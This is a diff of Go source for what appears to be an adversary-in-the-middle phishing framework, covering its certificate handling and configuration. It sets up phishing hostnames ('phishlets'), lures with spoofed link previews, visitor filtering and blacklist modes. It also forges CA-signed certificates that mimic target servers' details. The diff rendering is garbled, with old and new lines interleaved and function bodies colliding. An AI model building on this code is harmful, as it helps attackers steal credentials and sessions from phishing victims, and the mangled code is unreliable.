crt_dir := filepath.Join(d.dataDir, base_domain)
|
||||
|
||||
cert, err := tls.LoadX509KeyPair(filepath.Join(crt_dir, site_name+".crt"), filepath.Join(crt_dir, site_name+".key"))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
d.addPhishletCertificate(site_name, base_domain, &cert)
|
||||
func (o *CertDb) reloadCertificates() error {
|
||||
// TODO: load private certificates from disk
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) obtainPhishletCertificate(site_name string, base_domain string, domains []string) error {
|
||||
if err := CreateDir(filepath.Join(d.dataDir, base_domain), 0700); err != nil {
|
||||
return err
|
||||
}
|
||||
crt_dir := filepath.Join(d.dataDir, base_domain)
|
||||
func (o *CertDb) getTLSCertificate(host string, port int) (*x509.Certificate, error) {
|
||||
log.Debug("Fetching TLS certificate for %s:%d ...", host, port)
|
||||
|
||||
cert_res, err := d.registerCertificate(domains)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
cert, err := tls.X509KeyPair(cert_res.Certificate, cert_res.PrivateKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
d.addPhishletCertificate(site_name, base_domain, &cert)
|
||||
|
||||
err = ioutil.WriteFile(filepath.Join(crt_dir, site_name+".crt"), cert_res.Certificate, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = ioutil.WriteFile(filepath.Join(crt_dir, site_name+".key"), cert_res.PrivateKey, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) registerCertificate(domains []string) (*certificate.Resource, error) {
|
||||
var err error
|
||||
d.certUser = CertUser{
|
||||
Email: "", //hostmaster@" + d.cfg.GetBaseDomain(),
|
||||
key: d.PrivateKey,
|
||||
}
|
||||
|
||||
config := lego.NewConfig(&d.certUser)
|
||||
config.CADirURL = acmeURL
|
||||
config.Certificate.KeyType = certcrypto.RSA2048
|
||||
|
||||
d.client, err = lego.NewClient(config)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
d.httpChallenge = &HTTPChallenge{crt_db: d}
|
||||
|
||||
d.client.Challenge.SetHTTP01Provider(d.httpChallenge)
|
||||
d.client.Challenge.Remove(challenge.TLSALPN01)
|
||||
|
||||
reg, err := d.client.Registration.Register(registration.RegisterOptions{TermsOfServiceAgreed: true})
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
d.certUser.Registration = reg
|
||||
|
||||
req := certificate.ObtainRequest{
|
||||
Domains: domains,
|
||||
Bundle: true,
|
||||
}
|
||||
|
||||
cert_res, err := d.client.Certificate.Obtain(req)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return cert_res, nil
|
||||
}
|
||||
|
||||
func (d *CertDb) getServerCertificate(host string, port int) *x509.Certificate {
|
||||
log.Debug("Fetching TLS certificate from %s:%d ...", host, port)
|
||||
|
||||
config := tls.Config{InsecureSkipVerify: true}
|
||||
config := tls.Config{InsecureSkipVerify: true, NextProtos: []string{"http/1.1"}}
|
||||
conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", host, port), &config)
|
||||
if err != nil {
|
||||
log.Warning("Could not fetch TLS certificate from %s:%d: %s", host, port, err)
|
||||
return nil
|
||||
return nil, err
|
||||
}
|
||||
defer conn.Close()
|
||||
|
||||
state := conn.ConnectionState()
|
||||
|
||||
return state.PeerCertificates[0]
|
||||
return state.PeerCertificates[0], nil
|
||||
}
|
||||
|
||||
func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int) (cert *tls.Certificate, err error) {
|
||||
func (o *CertDb) getSelfSignedCertificate(host string, phish_host string, port int) (cert *tls.Certificate, err error) {
|
||||
var x509ca *x509.Certificate
|
||||
var template x509.Certificate
|
||||
|
||||
cert, ok := d.tls_cache[host]
|
||||
cert, ok := o.tlsCache[host]
|
||||
if ok {
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
if x509ca, err = x509.ParseCertificate(d.CACert.Certificate[0]); err != nil {
|
||||
if x509ca, err = x509.ParseCertificate(o.caCert.Certificate[0]); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
@ -407,9 +219,9 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
|
||||
}
|
||||
template.Subject.CommonName = host
|
||||
} else {
|
||||
srvCert := d.getServerCertificate(host, port)
|
||||
if srvCert == nil {
|
||||
return nil, fmt.Errorf("failed to get TLS certificate for: %s", host)
|
||||
srvCert, err := o.getTLSCertificate(host, port)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to get TLS certificate for: %s:%d error: %s", host, port, err)
|
||||
} else {
|
||||
serialNumberLimit := new(big.Int).Lsh(big.NewInt(1), 128)
|
||||
serialNumber, err := rand.Int(rand.Reader, serialNumberLimit)
|
||||
@ -422,7 +234,7 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
|
||||
Issuer: x509ca.Subject,
|
||||
Subject: srvCert.Subject,
|
||||
NotBefore: srvCert.NotBefore,
|
||||
NotAfter: srvCert.NotAfter,
|
||||
NotAfter: time.Now().Add(time.Hour * 24 * 180),
|
||||
KeyUsage: srvCert.KeyUsage,
|
||||
ExtKeyUsage: srvCert.ExtKeyUsage,
|
||||
IPAddresses: srvCert.IPAddresses,
|
||||
@ -439,15 +251,15 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
|
||||
}
|
||||
|
||||
var derBytes []byte
|
||||
if derBytes, err = x509.CreateCertificate(rand.Reader, &template, x509ca, &pkey.PublicKey, d.CACert.PrivateKey); err != nil {
|
||||
if derBytes, err = x509.CreateCertificate(rand.Reader, &template, x509ca, &pkey.PublicKey, o.caCert.PrivateKey); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
cert = &tls.Certificate{
|
||||
Certificate: [][]byte{derBytes, d.CACert.Certificate[0]},
|
||||
Certificate: [][]byte{derBytes, o.caCert.Certificate[0]},
|
||||
PrivateKey: pkey,
|
||||
}
|
||||
|
||||
d.tls_cache[host] = cert
|
||||
o.tlsCache[host] = cert
|
||||
return cert, nil
|
||||
}
|
||||
|
592
core/config.go
592
core/config.go
@ -11,82 +11,101 @@ import (
|
||||
"github.com/spf13/viper"
|
||||
)
|
||||
|
||||
var BLACKLIST_MODES = []string{"all", "unauth", "noadd", "off"}
|
||||
|
||||
type Lure struct {
|
||||
Hostname string `mapstructure:"hostname" yaml:"hostname"`
|
||||
Path string `mapstructure:"path" yaml:"path"`
|
||||
RedirectUrl string `mapstructure:"redirect_url" yaml:"redirect_url"`
|
||||
Phishlet string `mapstructure:"phishlet" yaml:"phishlet"`
|
||||
Template string `mapstructure:"template" yaml:"template"`
|
||||
UserAgentFilter string `mapstructure:"ua_filter" yaml:"ua_filter"`
|
||||
Info string `mapstructure:"info" yaml:"info"`
|
||||
OgTitle string `mapstructure:"og_title" yaml:"og_title"`
|
||||
OgDescription string `mapstructure:"og_desc" yaml:"og_desc"`
|
||||
OgImageUrl string `mapstructure:"og_image" yaml:"og_image"`
|
||||
OgUrl string `mapstructure:"og_url" yaml:"og_url"`
|
||||
Hostname string `mapstructure:"hostname" json:"hostname" yaml:"hostname"`
|
||||
Path string `mapstructure:"path" json:"path" yaml:"path"`
|
||||
RedirectUrl string `mapstructure:"redirect_url" json:"redirect_url" yaml:"redirect_url"`
|
||||
Phishlet string `mapstructure:"phishlet" json:"phishlet" yaml:"phishlet"`
|
||||
Redirector string `mapstructure:"redirector" json:"redirector" yaml:"redirector"`
|
||||
UserAgentFilter string `mapstructure:"ua_filter" json:"ua_filter" yaml:"ua_filter"`
|
||||
Info string `mapstructure:"info" json:"info" yaml:"info"`
|
||||
OgTitle string `mapstructure:"og_title" json:"og_title" yaml:"og_title"`
|
||||
OgDescription string `mapstructure:"og_desc" json:"og_desc" yaml:"og_desc"`
|
||||
OgImageUrl string `mapstructure:"og_image" json:"og_image" yaml:"og_image"`
|
||||
OgUrl string `mapstructure:"og_url" json:"og_url" yaml:"og_url"`
|
||||
}
|
||||
|
||||
type SubPhishlet struct {
|
||||
Name string `mapstructure:"name" json:"name" yaml:"name"`
|
||||
ParentName string `mapstructure:"parent_name" json:"parent_name" yaml:"parent_name"`
|
||||
Params map[string]string `mapstructure:"params" json:"params" yaml:"params"`
|
||||
}
|
||||
|
||||
type PhishletConfig struct {
|
||||
Hostname string `mapstructure:"hostname" json:"hostname" yaml:"hostname"`
|
||||
Enabled bool `mapstructure:"enabled" json:"enabled" yaml:"enabled"`
|
||||
Visible bool `mapstructure:"visible" json:"visible" yaml:"visible"`
|
||||
}
|
||||
|
||||
type ProxyConfig struct {
|
||||
Type string `mapstructure:"type" json:"type" yaml:"type"`
|
||||
Address string `mapstructure:"address" json:"address" yaml:"address"`
|
||||
Port int `mapstructure:"port" json:"port" yaml:"port"`
|
||||
Username string `mapstructure:"username" json:"username" yaml:"username"`
|
||||
Password string `mapstructure:"password" json:"password" yaml:"password"`
|
||||
Enabled bool `mapstructure:"enabled" json:"enabled" yaml:"enabled"`
|
||||
}
|
||||
|
||||
type BlacklistConfig struct {
|
||||
Mode string `mapstructure:"mode" json:"mode" yaml:"mode"`
|
||||
}
|
||||
|
||||
type CertificatesConfig struct {
|
||||
}
|
||||
|
||||
type GeneralConfig struct {
|
||||
Domain string `mapstructure:"domain" json:"domain" yaml:"domain"`
|
||||
Ipv4 string `mapstructure:"ipv4" json:"ipv4" yaml:"ipv4"`
|
||||
RedirectUrl string `mapstructure:"redirect_url" json:"redirect_url" yaml:"redirect_url"`
|
||||
HttpsPort int `mapstructure:"https_port" json:"https_port" yaml:"https_port"`
|
||||
DnsPort int `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"`
|
||||
}
|
||||
|
||||
type Config struct {
|
||||
siteDomains map[string]string
|
||||
baseDomain string
|
||||
serverIP string
|
||||
proxyType string
|
||||
proxyAddress string
|
||||
proxyPort int
|
||||
proxyUsername string
|
||||
proxyPassword string
|
||||
blackListMode string
|
||||
proxyEnabled bool
|
||||
sitesEnabled map[string]bool
|
||||
sitesHidden map[string]bool
|
||||
phishlets map[string]*Phishlet
|
||||
phishletNames []string
|
||||
activeHostnames []string
|
||||
redirectParam string
|
||||
verificationParam string
|
||||
verificationToken string
|
||||
redirectUrl string
|
||||
templatesDir string
|
||||
lures []*Lure
|
||||
cfg *viper.Viper
|
||||
general *GeneralConfig
|
||||
certificates *CertificatesConfig
|
||||
blacklistConfig *BlacklistConfig
|
||||
proxyConfig *ProxyConfig
|
||||
phishletConfig map[string]*PhishletConfig
|
||||
phishlets map[string]*Phishlet
|
||||
phishletNames []string
|
||||
activeHostnames []string
|
||||
redirectorsDir string
|
||||
lures []*Lure
|
||||
subphishlets []*SubPhishlet
|
||||
cfg *viper.Viper
|
||||
}
|
||||
|
||||
const (
|
||||
CFG_SITE_DOMAINS = "site_domains"
|
||||
CFG_BASE_DOMAIN = "server"
|
||||
CFG_SERVER_IP = "ip"
|
||||
CFG_SITES_ENABLED = "sites_enabled"
|
||||
CFG_SITES_HIDDEN = "sites_hidden"
|
||||
CFG_REDIRECT_PARAM = "redirect_key"
|
||||
CFG_VERIFICATION_PARAM = "verification_key"
|
||||
CFG_VERIFICATION_TOKEN = "verification_token"
|
||||
CFG_REDIRECT_URL = "redirect_url"
|
||||
CFG_LURES = "lures"
|
||||
CFG_PROXY_TYPE = "proxy_type"
|
||||
CFG_PROXY_ADDRESS = "proxy_address"
|
||||
CFG_PROXY_PORT = "proxy_port"
|
||||
CFG_PROXY_USERNAME = "proxy_username"
|
||||
CFG_PROXY_PASSWORD = "proxy_password"
|
||||
CFG_PROXY_ENABLED = "proxy_enabled"
|
||||
CFG_BLACKLIST_MODE = "blacklist_mode"
|
||||
CFG_GENERAL = "general"
|
||||
CFG_CERTIFICATES = "certificates"
|
||||
CFG_LURES = "lures"
|
||||
CFG_PROXY = "proxy"
|
||||
CFG_PHISHLETS = "phishlets"
|
||||
CFG_BLACKLIST = "blacklist"
|
||||
CFG_SUBPHISHLETS = "subphishlets"
|
||||
)
|
||||
|
||||
const DEFAULT_REDIRECT_URL = "https://www.youtube.com/watch?v=dQw4w9WgXcQ" // Rick'roll
|
||||
|
||||
func NewConfig(cfg_dir string, path string) (*Config, error) {
|
||||
c := &Config{
|
||||
siteDomains: make(map[string]string),
|
||||
sitesEnabled: make(map[string]bool),
|
||||
sitesHidden: make(map[string]bool),
|
||||
phishlets: make(map[string]*Phishlet),
|
||||
phishletNames: []string{},
|
||||
lures: []*Lure{},
|
||||
general: &GeneralConfig{},
|
||||
certificates: &CertificatesConfig{},
|
||||
phishletConfig: make(map[string]*PhishletConfig),
|
||||
phishlets: make(map[string]*Phishlet),
|
||||
phishletNames: []string{},
|
||||
lures: []*Lure{},
|
||||
blacklistConfig: &BlacklistConfig{},
|
||||
}
|
||||
|
||||
c.cfg = viper.New()
|
||||
c.cfg.SetConfigType("yaml")
|
||||
c.cfg.SetConfigType("json")
|
||||
|
||||
if path == "" {
|
||||
path = filepath.Join(cfg_dir, "config.yaml")
|
||||
path = filepath.Join(cfg_dir, "config.json")
|
||||
}
|
||||
err := os.MkdirAll(filepath.Dir(path), os.FileMode(0700))
|
||||
if err != nil {
|
||||
@ -107,96 +126,107 @@ func NewConfig(cfg_dir string, path string) (*Config, error) {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
c.baseDomain = c.cfg.GetString(CFG_BASE_DOMAIN)
|
||||
c.serverIP = c.cfg.GetString(CFG_SERVER_IP)
|
||||
c.siteDomains = c.cfg.GetStringMapString(CFG_SITE_DOMAINS)
|
||||
c.redirectParam = c.cfg.GetString(CFG_REDIRECT_PARAM)
|
||||
c.verificationParam = c.cfg.GetString(CFG_VERIFICATION_PARAM)
|
||||
c.verificationToken = c.cfg.GetString(CFG_VERIFICATION_TOKEN)
|
||||
c.redirectUrl = c.cfg.GetString(CFG_REDIRECT_URL)
|
||||
c.proxyType = c.cfg.GetString(CFG_PROXY_TYPE)
|
||||
c.proxyAddress = c.cfg.GetString(CFG_PROXY_ADDRESS)
|
||||
c.proxyPort = c.cfg.GetInt(CFG_PROXY_PORT)
|
||||
c.proxyUsername = c.cfg.GetString(CFG_PROXY_USERNAME)
|
||||
c.proxyPassword = c.cfg.GetString(CFG_PROXY_PASSWORD)
|
||||
c.proxyEnabled = c.cfg.GetBool(CFG_PROXY_ENABLED)
|
||||
c.blackListMode = c.cfg.GetString(CFG_BLACKLIST_MODE)
|
||||
s_enabled := c.cfg.GetStringSlice(CFG_SITES_ENABLED)
|
||||
for _, site := range s_enabled {
|
||||
c.sitesEnabled[site] = true
|
||||
}
|
||||
s_hidden := c.cfg.GetStringSlice(CFG_SITES_HIDDEN)
|
||||
for _, site := range s_hidden {
|
||||
c.sitesHidden[site] = true
|
||||
c.cfg.UnmarshalKey(CFG_GENERAL, &c.general)
|
||||
c.cfg.UnmarshalKey(CFG_BLACKLIST, &c.blacklistConfig)
|
||||
|
||||
if !stringExists(c.blacklistConfig.Mode, BLACKLIST_MODES) {
|
||||
c.SetBlacklistMode("unauth")
|
||||
}
|
||||
|
||||
if !stringExists(c.blackListMode, []string{"all", "unauth", "off"}) {
|
||||
c.SetBlacklistMode("off")
|
||||
}
|
||||
|
||||
var param string
|
||||
if c.redirectParam == "" {
|
||||
param = strings.ToLower(GenRandomString(2))
|
||||
c.SetRedirectParam(param)
|
||||
}
|
||||
if c.verificationParam == "" {
|
||||
for {
|
||||
param = strings.ToLower(GenRandomString(2))
|
||||
if param != c.redirectParam {
|
||||
break
|
||||
}
|
||||
}
|
||||
c.SetVerificationParam(param)
|
||||
}
|
||||
if c.verificationToken == "" {
|
||||
c.SetVerificationToken(GenRandomToken()[:4])
|
||||
}
|
||||
if c.redirectUrl == "" && created_cfg {
|
||||
if c.general.RedirectUrl == "" && created_cfg {
|
||||
c.SetRedirectUrl(DEFAULT_REDIRECT_URL)
|
||||
}
|
||||
if c.general.HttpsPort == 0 {
|
||||
c.SetHttpsPort(443)
|
||||
}
|
||||
if c.general.DnsPort == 0 {
|
||||
c.SetDnsPort(53)
|
||||
}
|
||||
|
||||
c.lures = []*Lure{}
|
||||
c.cfg.UnmarshalKey(CFG_LURES, &c.lures)
|
||||
c.proxyConfig = &ProxyConfig{}
|
||||
c.cfg.UnmarshalKey(CFG_PROXY, &c.proxyConfig)
|
||||
c.cfg.UnmarshalKey(CFG_PHISHLETS, &c.phishletConfig)
|
||||
c.cfg.UnmarshalKey(CFG_CERTIFICATES, &c.certificates)
|
||||
|
||||
return c, nil
|
||||
}
|
||||
|
||||
func (c *Config) SetSiteHostname(site string, domain string) bool {
|
||||
if c.baseDomain == "" {
|
||||
log.Error("you need to set server domain, first. type: server your-domain.com")
|
||||
func (c *Config) PhishletConfig(site string) *PhishletConfig {
|
||||
if o, ok := c.phishletConfig[site]; ok {
|
||||
return o
|
||||
} else {
|
||||
o := &PhishletConfig{
|
||||
Hostname: "",
|
||||
Enabled: false,
|
||||
Visible: true,
|
||||
}
|
||||
c.phishletConfig[site] = o
|
||||
return o
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Config) SavePhishlets() {
|
||||
c.cfg.Set(CFG_PHISHLETS, c.phishletConfig)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetSiteHostname(site string, hostname string) bool {
|
||||
if c.general.Domain == "" {
|
||||
log.Error("you need to set server top-level domain, first. type: server your-domain.com")
|
||||
return false
|
||||
}
|
||||
if _, err := c.GetPhishlet(site); err != nil {
|
||||
pl, err := c.GetPhishlet(site)
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
return false
|
||||
}
|
||||
if domain != c.baseDomain && !strings.HasSuffix(domain, "."+c.baseDomain) {
|
||||
log.Error("phishlet hostname must end with '%s'", c.baseDomain)
|
||||
if pl.isTemplate {
|
||||
log.Error("phishlet is a template - can't set hostname")
|
||||
return false
|
||||
}
|
||||
c.siteDomains[site] = domain
|
||||
c.cfg.Set(CFG_SITE_DOMAINS, c.siteDomains)
|
||||
log.Info("phishlet '%s' hostname set to: %s", site, domain)
|
||||
c.cfg.WriteConfig()
|
||||
if hostname != "" && hostname != c.general.Domain && !strings.HasSuffix(hostname, "."+c.general.Domain) {
|
||||
log.Error("phishlet hostname must end with '%s'", c.general.Domain)
|
||||
return false
|
||||
}
|
||||
log.Info("phishlet '%s' hostname set to: %s", site, hostname)
|
||||
c.PhishletConfig(site).Hostname = hostname
|
||||
c.SavePhishlets()
|
||||
return true
|
||||
}
|
||||
|
||||
func (c *Config) SetBaseDomain(domain string) {
|
||||
c.baseDomain = domain
|
||||
c.cfg.Set(CFG_BASE_DOMAIN, c.baseDomain)
|
||||
c.general.Domain = domain
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("server domain set to: %s", domain)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetServerIP(ip_addr string) {
|
||||
c.serverIP = ip_addr
|
||||
c.cfg.Set(CFG_SERVER_IP, c.serverIP)
|
||||
c.general.Ipv4 = ip_addr
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("server IP set to: %s", ip_addr)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetHttpsPort(port int) {
|
||||
c.general.HttpsPort = port
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("https port set to: %d", port)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetDnsPort(port int) {
|
||||
c.general.DnsPort = port
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("dns port set to: %d", port)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) EnableProxy(enabled bool) {
|
||||
c.proxyEnabled = enabled
|
||||
c.cfg.Set(CFG_PROXY_ENABLED, c.proxyEnabled)
|
||||
c.proxyConfig.Enabled = enabled
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
if enabled {
|
||||
log.Info("enabled proxy")
|
||||
} else {
|
||||
@ -211,44 +241,44 @@ func (c *Config) SetProxyType(ptype string) {
|
||||
log.Error("invalid proxy type selected")
|
||||
return
|
||||
}
|
||||
c.proxyType = ptype
|
||||
c.cfg.Set(CFG_PROXY_TYPE, c.proxyType)
|
||||
log.Info("proxy type set to: %s", c.proxyType)
|
||||
c.proxyConfig.Type = ptype
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
log.Info("proxy type set to: %s", ptype)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetProxyAddress(address string) {
|
||||
c.proxyAddress = address
|
||||
c.cfg.Set(CFG_PROXY_ADDRESS, c.proxyAddress)
|
||||
log.Info("proxy address set to: %s", c.proxyAddress)
|
||||
c.proxyConfig.Address = address
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
log.Info("proxy address set to: %s", address)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetProxyPort(port int) {
|
||||
c.proxyPort = port
|
||||
c.cfg.Set(CFG_PROXY_PORT, c.proxyPort)
|
||||
log.Info("proxy port set to: %d", c.proxyPort)
|
||||
c.proxyConfig.Port = port
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig.Port)
|
||||
log.Info("proxy port set to: %d", port)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetProxyUsername(username string) {
|
||||
c.proxyUsername = username
|
||||
c.cfg.Set(CFG_PROXY_USERNAME, c.proxyUsername)
|
||||
log.Info("proxy username set to: %s", c.proxyUsername)
|
||||
c.proxyConfig.Username = username
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
log.Info("proxy username set to: %s", username)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetProxyPassword(password string) {
|
||||
c.proxyPassword = password
|
||||
c.cfg.Set(CFG_PROXY_PASSWORD, c.proxyPassword)
|
||||
log.Info("proxy password set to: %s", c.proxyPassword)
|
||||
c.proxyConfig.Password = password
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
log.Info("proxy password set to: %s", password)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) IsLureHostnameValid(hostname string) bool {
|
||||
for _, l := range c.lures {
|
||||
if l.Hostname == hostname {
|
||||
if c.sitesEnabled[l.Phishlet] {
|
||||
if c.PhishletConfig(l.Phishlet).Enabled {
|
||||
return true
|
||||
}
|
||||
}
|
||||
@ -257,21 +287,23 @@ func (c *Config) IsLureHostnameValid(hostname string) bool {
|
||||
}
|
||||
|
||||
func (c *Config) SetSiteEnabled(site string) error {
|
||||
if _, err := c.GetPhishlet(site); err != nil {
|
||||
pl, err := c.GetPhishlet(site)
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
return err
|
||||
}
|
||||
if !c.IsSiteEnabled(site) {
|
||||
c.sitesEnabled[site] = true
|
||||
if c.PhishletConfig(site).Hostname == "" {
|
||||
return fmt.Errorf("enabling phishlet '%s' requires its hostname to be set up", site)
|
||||
}
|
||||
if pl.isTemplate {
|
||||
return fmt.Errorf("phishlet '%s' is a template - you have to 'create' child phishlet from it, with predefined parameters, before you can enable it.", site)
|
||||
}
|
||||
c.PhishletConfig(site).Enabled = true
|
||||
c.refreshActiveHostnames()
|
||||
var sites []string
|
||||
for s, _ := range c.sitesEnabled {
|
||||
sites = append(sites, s)
|
||||
}
|
||||
c.cfg.Set(CFG_SITES_ENABLED, sites)
|
||||
c.VerifyPhishlets()
|
||||
log.Info("enabled phishlet '%s'", site)
|
||||
c.cfg.WriteConfig()
|
||||
|
||||
c.SavePhishlets()
|
||||
return nil
|
||||
}
|
||||
|
||||
@ -280,17 +312,11 @@ func (c *Config) SetSiteDisabled(site string) error {
|
||||
log.Error("%v", err)
|
||||
return err
|
||||
}
|
||||
if c.IsSiteEnabled(site) {
|
||||
delete(c.sitesEnabled, site)
|
||||
}
|
||||
c.PhishletConfig(site).Enabled = false
|
||||
c.refreshActiveHostnames()
|
||||
var sites []string
|
||||
for s, _ := range c.sitesEnabled {
|
||||
sites = append(sites, s)
|
||||
}
|
||||
c.cfg.Set(CFG_SITES_ENABLED, sites)
|
||||
log.Info("disabled phishlet '%s'", site)
|
||||
c.cfg.WriteConfig()
|
||||
|
||||
c.SavePhishlets()
|
||||
return nil
|
||||
}
|
||||
|
||||
@ -299,102 +325,57 @@ func (c *Config) SetSiteHidden(site string, hide bool) error {
|
||||
log.Error("%v", err)
|
||||
return err
|
||||
}
|
||||
if hide {
|
||||
if !c.IsSiteHidden(site) {
|
||||
c.sitesHidden[site] = true
|
||||
}
|
||||
} else {
|
||||
if c.IsSiteHidden(site) {
|
||||
delete(c.sitesHidden, site)
|
||||
}
|
||||
}
|
||||
c.PhishletConfig(site).Visible = !hide
|
||||
c.refreshActiveHostnames()
|
||||
var sites []string
|
||||
for s, _ := range c.sitesHidden {
|
||||
sites = append(sites, s)
|
||||
}
|
||||
c.cfg.Set(CFG_SITES_HIDDEN, sites)
|
||||
|
||||
if hide {
|
||||
log.Info("phishlet '%s' is now hidden and all requests to it will be redirected", site)
|
||||
} else {
|
||||
log.Info("phishlet '%s' is now reachable and visible from the outside", site)
|
||||
}
|
||||
c.cfg.WriteConfig()
|
||||
c.SavePhishlets()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *Config) SetTemplatesDir(path string) {
|
||||
c.templatesDir = path
|
||||
func (c *Config) SetRedirectorsDir(path string) {
|
||||
c.redirectorsDir = path
|
||||
}
|
||||
|
||||
func (c *Config) ResetAllSites() {
|
||||
for s, _ := range c.sitesEnabled {
|
||||
c.SetSiteDisabled(s)
|
||||
}
|
||||
for s, _ := range c.phishlets {
|
||||
c.siteDomains[s] = ""
|
||||
}
|
||||
c.cfg.Set(CFG_SITE_DOMAINS, c.siteDomains)
|
||||
c.cfg.WriteConfig()
|
||||
c.phishletConfig = make(map[string]*PhishletConfig)
|
||||
c.SavePhishlets()
|
||||
}
|
||||
|
||||
func (c *Config) IsSiteEnabled(site string) bool {
|
||||
s, ok := c.sitesEnabled[site]
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
return s
|
||||
return c.PhishletConfig(site).Enabled
|
||||
}
|
||||
|
||||
func (c *Config) IsSiteHidden(site string) bool {
|
||||
s, ok := c.sitesHidden[site]
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
return s
|
||||
return !c.PhishletConfig(site).Visible
|
||||
}
|
||||
|
||||
func (c *Config) GetEnabledSites() []string {
|
||||
var sites []string
|
||||
for s, _ := range c.sitesEnabled {
|
||||
sites = append(sites, s)
|
||||
for k, o := range c.phishletConfig {
|
||||
if o.Enabled {
|
||||
sites = append(sites, k)
|
||||
}
|
||||
}
|
||||
return sites
|
||||
}
|
||||
|
||||
func (c *Config) SetRedirectParam(param string) {
|
||||
c.redirectParam = param
|
||||
c.cfg.Set(CFG_REDIRECT_PARAM, param)
|
||||
log.Info("redirect parameter set to: %s", param)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetBlacklistMode(mode string) {
|
||||
if stringExists(mode, []string{"all", "unauth", "off"}) {
|
||||
c.blackListMode = mode
|
||||
c.cfg.Set(CFG_BLACKLIST_MODE, mode)
|
||||
if stringExists(mode, BLACKLIST_MODES) {
|
||||
c.blacklistConfig.Mode = mode
|
||||
c.cfg.Set(CFG_BLACKLIST, c.blacklistConfig)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
log.Info("blacklist mode set to: %s", mode)
|
||||
}
|
||||
|
||||
func (c *Config) SetVerificationParam(param string) {
|
||||
c.verificationParam = param
|
||||
c.cfg.Set(CFG_VERIFICATION_PARAM, param)
|
||||
log.Info("verification parameter set to: %s", param)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetVerificationToken(token string) {
|
||||
c.verificationToken = token
|
||||
c.cfg.Set(CFG_VERIFICATION_TOKEN, token)
|
||||
log.Info("verification token set to: %s", token)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetRedirectUrl(url string) {
|
||||
c.redirectUrl = url
|
||||
c.cfg.Set(CFG_REDIRECT_URL, url)
|
||||
c.general.RedirectUrl = url
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("unauthorized request redirection URL set to: %s", url)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
@ -407,20 +388,46 @@ func (c *Config) refreshActiveHostnames() {
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
for _, host := range pl.GetPhishHosts() {
|
||||
c.activeHostnames = append(c.activeHostnames, host)
|
||||
for _, host := range pl.GetPhishHosts(false) {
|
||||
c.activeHostnames = append(c.activeHostnames, strings.ToLower(host))
|
||||
}
|
||||
}
|
||||
for _, l := range c.lures {
|
||||
if stringExists(l.Phishlet, sites) {
|
||||
if l.Hostname != "" {
|
||||
c.activeHostnames = append(c.activeHostnames, l.Hostname)
|
||||
c.activeHostnames = append(c.activeHostnames, strings.ToLower(l.Hostname))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Config) GetActiveHostnames(site string) []string {
|
||||
var ret []string
|
||||
sites := c.GetEnabledSites()
|
||||
for _, _site := range sites {
|
||||
if site == "" || _site == site {
|
||||
pl, err := c.GetPhishlet(_site)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
for _, host := range pl.GetPhishHosts(false) {
|
